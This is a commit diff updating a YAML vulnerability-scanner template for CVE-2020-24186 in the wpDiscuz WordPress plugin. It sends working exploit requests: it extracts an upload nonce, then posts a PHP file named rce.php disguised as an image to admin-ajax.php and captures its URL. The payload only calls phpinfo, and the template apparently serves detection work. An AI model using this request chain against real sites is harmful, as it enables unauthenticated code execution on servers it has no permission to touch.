template update

patch-1
sandeep 2021-03-14 19:47:36 +05:30
parent 470ce55003
commit 83fd749b4e
1 changed files with 61 additions and 26 deletions

View File

@ -1,54 +1,89 @@
id: CVE-2020-24186
info:
name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins
severity: high
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin
tags: cve,cve2020,wordpress,wp-plugin,rce
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Content-Length: 774
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
Connection: close
------WebKitFormBoundaryUGWBOKSwsalnzhha
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 745
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundaryUGWBOKSwsalnzhha
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_nonce"
aede3ab0b2
------WebKitFormBoundaryUGWBOKSwsalnzhha
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
Content-Type: image/jpeg
ÿØÿájExifMM*<2A><><EFBFBD>i<EFBFBD><69>><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¨<EFBFBD><C2A8><EFBFBD><EFBFBD>À<EFBFBD><C380><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ÿà<C3BF>JFIF<49><46><EFBFBD><EFBFBD>ÿÛC<C39B><43><EFBFBD>
<EFBFBD><EFBFBD>
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
<?php phpinfo();?>
------WebKitFormBoundaryUGWBOKSwsalnzhha
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="postId"
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
393
------WebKitFormBoundaryUGWBOKSwsalnzhha--
extractors:
- type: regex
part: body
internal: true
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
- type: regex
part: body
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
part: body